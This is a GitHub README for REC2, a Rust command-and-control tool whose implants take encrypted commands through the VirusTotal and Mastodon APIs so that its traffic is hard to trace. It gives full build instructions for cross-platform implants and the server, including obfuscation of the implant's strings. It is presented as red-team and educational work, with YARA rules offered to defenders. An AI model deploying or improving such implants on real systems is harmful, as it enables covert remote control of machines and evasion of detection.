- Notifications
You must be signed in to change notification settings - Fork22
REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust. 🦀
License
g0h4n/REC2
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
Information: REC2 is an old personal project (early 2023) that I didn't continue development on. It's part of a list of projects that helped me to learn Rust. The code is probably considered obsolete and not in its best form. Maybe I'll pick up where I left off#roadmap. However,REC2 is fully functional and allow to execute commands on a Linux / macOS or Windows targetfrom the VirusTotal and Mastodon APIs.
⚠️ Disclaimer:REC2 is for educational purposes only. Use this at your own discretion, I cannot be held responsible for any damages caused.Usage of this tool for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. I assume no liability and are not responsible for any misuse or damage caused by this tool.
🔴Redteamer: I share with you a beta version of one of my external C2 using virustotal and mastodon
🔵Blueteamer: You can find an example of yara rules for REC2 implants in this same repo
REC2, orRustyExternalCommand andControl, is a versatile Command and Control (C2) tool developed in the Rust programming language. It provides a discreet and effective means to manage remote implants (clients) on macOS, Linux, and Windows systems. REC2 utilizes third-party APIs likeVirusTotal orMastodon to transmit encrypted messages using AES between the server and implants, allowing attackers to operate stealthily through these external channels. Implants can monitor pending jobs, retrieve, decrypt, execute tasks on the target system, and securely transmit results back via the same APIs. Using these APIs as intermediaries adds an extra layer of anonymization, reducing the ease of tracing back to the attacker.
Change some values inimplants/(mastodon,virustotal)/src/main.rs :
// (MASTODON or VIRUSTOTAL) TOKEN// <https://mastodon.be/settings/applications>// <https://developers.virustotal.com/reference/authentication>let token =lc!("TOKEN").to_owned();// (MASTODON or VIRUSTOTAL) FULL URL//let full_url = lc!("https://mastodon.xx/@username/100123451234512345").to_owned();let full_url =lc!("https://www.virustotal.com/gui/file/99ff0b679081cdca00eb27c5be5fd9428f1a7cf781cc438b937cf8baf8551c4d").to_owned();
MakeWindows x64 implant static binary:
make virustotal_windowsmake mastodon_windows
You can find (rec2_virustotal_x64.exe orrec2_mastodon_x64.exe) in your current directory.
And to finish, compile theserver binary:
make c2server_release./server_release -h./server_release VirusTotal -h./server_release Mastodon -h# Example./server_release VirusTotal --url<URL> --token<TOKEN> --key<AES_KEY>
Now you just need to execute implant in your target.
You can use themake command to compile it for Linux, Windows or mac0S.
More command in theMakefile:
REC2 Server:usage: make c2server_debugusage: make c2server_releaseusage: make c2server_windowsusage: make c2server_windows_x64usage: make c2server_windows_x86usage: make c2server_linuxusage: make c2server_linux_aarch64usage: make c2server_linux_x86_64usage: make c2server_macosusage: make c2server_arm_muslusage: make c2server_armv7VirusTotal implant:usage: make virustotal_debugusage: make virustotal_releaseusage: make virustotal_windowsusage: make virustotal_windows_x64usage: make virustotal_windows_x86usage: make virustotal_linuxusage: make virustotal_linux_aarch64usage: make virustotal_linux_x86_64usage: make virustotal_macosusage: make virustotal_arm_muslusage: make virustotal_armv7Mastodon implant:usage: make mastodon_debugusage: make mastodon_releaseusage: make mastodon_windowsusage: make mastodon_windows_x64usage: make mastodon_windows_x86usage: make mastodon_linuxusage: make mastodon_linux_aarch64usage: make mastodon_linux_x86_64usage: make mastodon_macosusage: make mastodon_arm_muslusage: make mastodon_armv7Dependencies:usage: make install_windows_depsusage: make install_macos_depsDocumentation:usage: make c2server_docusage: make virustotal_docusage: make mastodon_docCleaning:usage: make clean
Build REC2 with docker to make sure to have all dependencies.
docker build --rm -t rec2.# Then to build C2 server:docker run --rm -v ./:/usr/src/rec2 rec2 c2server_windowsdocker run --rm -v ./:/usr/src/rec2 rec2 c2server_linuxdocker run --rm -v ./:/usr/src/rec2 rec2 c2server_macos# Then to build VirusTotal implant:docker run --rm -v ./:/usr/src/rec2 rec2 virustotal_windowsdocker run --rm -v ./:/usr/src/rec2 rec2 virustotal_linuxdocker run --rm -v ./:/usr/src/rec2 rec2 virustotal_macos# Then to build Mastodon implant:docker run --rm -v ./:/usr/src/rec2 rec2 mastodon_windowsdocker run --rm -v ./:/usr/src/rec2 rec2 mastodon_linuxdocker run --rm -v ./:/usr/src/rec2 rec2 mastodon_macos
SHOW MORE
You will need to install Rust on your system.
https://www.rust-lang.org/fr/tools/install
:warining: You need to export
LITCRYPT_ENCRYPT_KEYvariable in your terminal before to compile it. (for implants strings obfuscation)
export LITCRYPT_ENCRYPT_KEY="MYSUPERPASSWORD1234567890"LITCRYPT_ENCRYPT_KEY="MYSUPERPASSWORD1234567890"
:warining: You need to change AESKEY inimplants/(virustotal,mastodon)/main.rs and to change URL and TOKEN.
Here is how to compile the "release" and "debug" versions using thecargo command.
git clone https://github.com/g0h4n/REC2cd REC2# Implants# choise your implant Mastodon or VirusTotal# implants/mastodon/Cargo.toml# release versioncargo build --release --manifest --manifest-path implants/mastodon/Cargo.toml# or debug versioncargo b --manifest-path implants/mastodon/Cargo.toml# implants/virustotal/Cargo.toml# release versioncargo build --release --manifest --manifest-path implants/virustotal/Cargo.toml# or debug versioncargo b --manifest-path implants/virustotal/Cargo.toml# Servercargo build --release --manifest --manifest-path server/Cargo.toml# or debug versioncargo b --manifest-path server/Cargo.toml
TheImplants result can be found in theimplants/(mastodon,virustotal)/target/release or in theimplants/(mastodon,virustotal)/target/debug folder. Theserver result can be found in theserver/target/release or in theserver/target/debug folder.
Below you can find the compilation methodology for each of the OS from Linux.If you need another compilation system, please consult the list in this link:https://doc.rust-lang.org/nightly/rustc/platform-support.html
# Install rustup and Cargo for Linuxcurl https://sh.rustup.rs -sSf| sh# Add Linux depsrustup install stable-x86_64-unknown-linux-gnurustup target add x86_64-unknown-linux-gnu# Static compilation for Linuxgit clone https://github.com/g0h4n/REC2cd REC2# Implants# choise your implant Mastodon or VirusTotal# implants/mastodon/Cargo.tomlCFLAGS="-lrt";LDFLAGS="-lrt";RUSTFLAGS='-C target-feature=+crt-static';cargo build --release --target x86_64-unknown-linux-gnu --manifest-path implants/mastodon/Cargo.toml# implants/virustotal/Cargo.tomlCFLAGS="-lrt";LDFLAGS="-lrt";RUSTFLAGS='-C target-feature=+crt-static';cargo build --release --target x86_64-unknown-linux-gnu --manifest-path implants/virustotal/Cargo.toml# ServerCFLAGS="-lrt";LDFLAGS="-lrt";RUSTFLAGS='-C target-feature=+crt-static';cargo build --release --target x86_64-unknown-linux-gnu --manifest-path server/Cargo.toml
The result can be found in theimplants/(mastodon,virustotal)/target/x86_64-unknown-linux-gnu/release or inserver/target/x86_64-unknown-linux-gnu/release folder.
# Install rustup and Cargo in Linuxcurl https://sh.rustup.rs -sSf| sh# Add Windows depsrustup install stable-x86_64-pc-windows-gnurustup target add x86_64-pc-windows-gnu# Static compilation for Windowsgit clone https://github.com/g0h4n/REC2cd REC2# Implants# choise your implant Mastodon or VirusTotal# implants/mastodon/Cargo.tomlRUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-pc-windows-gnu --manifest-path implants/mastodon/Cargo.toml# implants/virustotal/Cargo.tomlRUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-pc-windows-gnu --manifest-path implants/virustotal/Cargo.toml# ServerRUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-pc-windows-gnu --manifest-path server/Cargo.toml
The result can be found in theimplants/(mastodon,virustotal)/target/x86_64-pc-windows-gnu/release or in theserver/target/x86_64-pc-windows-gnu/release folder.
Amazing documentation:https://wapl.es/rust/2019/02/17/rust-cross-compile-linux-to-macos.html
# Install rustup and Cargo in Linuxcurl https://sh.rustup.rs -sSf| sh# Add macOS tool chainsudo git clone https://github.com/tpoechtrager/osxcross /usr/local/bin/osxcrosssudo wget -P /usr/local/bin/osxcross/ -nc https://s3.dockerproject.org/darwin/v2/MacOSX10.10.sdk.tar.xz&& sudo mv /usr/local/bin/osxcross/MacOSX10.10.sdk.tar.xz /usr/local/bin/osxcross/tarballs/sudo UNATTENDED=yes OSX_VERSION_MIN=10.7 /usr/local/bin/osxcross/build.shsudo chmod 775 /usr/local/bin/osxcross/ -Rexport PATH="/usr/local/bin/osxcross/target/bin:$PATH"# Cargo needs to be told to use the correct linker for the x86_64-apple-darwin target, so add the following to your project’s .cargo/config file:grep'target.x86_64-apple-darwin'~/.cargo/config||echo"[target.x86_64-apple-darwin]">>~/.cargo/configgrep'linker = "x86_64-apple-darwin14-clang"'~/.cargo/config||echo'linker = "x86_64-apple-darwin14-clang"'>>~/.cargo/configgrep'ar = "x86_64-apple-darwin14-clang"'~/.cargo/config||echo'ar = "x86_64-apple-darwin14-clang"'>>~/.cargo/config# Static compilation for macOSgit clone https://github.com/g0h4n/REC2cd REC2# Implants# choise your implant Mastodon or VirusTotal# implants/mastodon/Cargo.tomlRUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-apple-darwin --manifest-path implants/mastodon/Cargo.toml# implants/virustotal/Cargo.tomlRUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-apple-darwin --manifest-path implants/virustotal/Cargo.toml# ServerRUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-apple-darwin --manifest-path server/Cargo.toml
The result can be found in the implants/(mastodon,virustotal)/target/x86_64-apple-darwin/release folder.
git clone https://github.com/g0h4n/REC2cd REC2# Implants# choise your implant Mastodon or VirusTotal# implants/mastodon/Cargo.tomlcargo doc --open --no-deps --manifest-path implants/mastodon/Cargo.toml# implants/virustotal/Cargo.tomlcargo doc --open --no-deps --manifest-path implants/virustotal/Cargo.toml# Servercargo doc --open --no-deps --manifest-path server/Cargo.toml
- CRYPTO
- AES
- IMPLANTS
- IMPLANTS
- SERVER
- SESSION
- JOBS
- Asynchrone jobs status check function
- Asynchrone sessions status check function
- Select current sessions with
sessions -i 1to attach session number 1 [09/28/2023] - Add
backgroundcommand [09/28/2023]
- SOCIAL NETWORK
- MASTODON:https://docs.rs/megalodon/latest/megalodon/
- VIRUSTOTAL:https://docs.rs/virustotal3/latest/virustotal3/
- SOUNDCLOUD:https://docs.rs/soundcloud/latest/soundcloud/
- Some ideas?
About
REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust. 🦀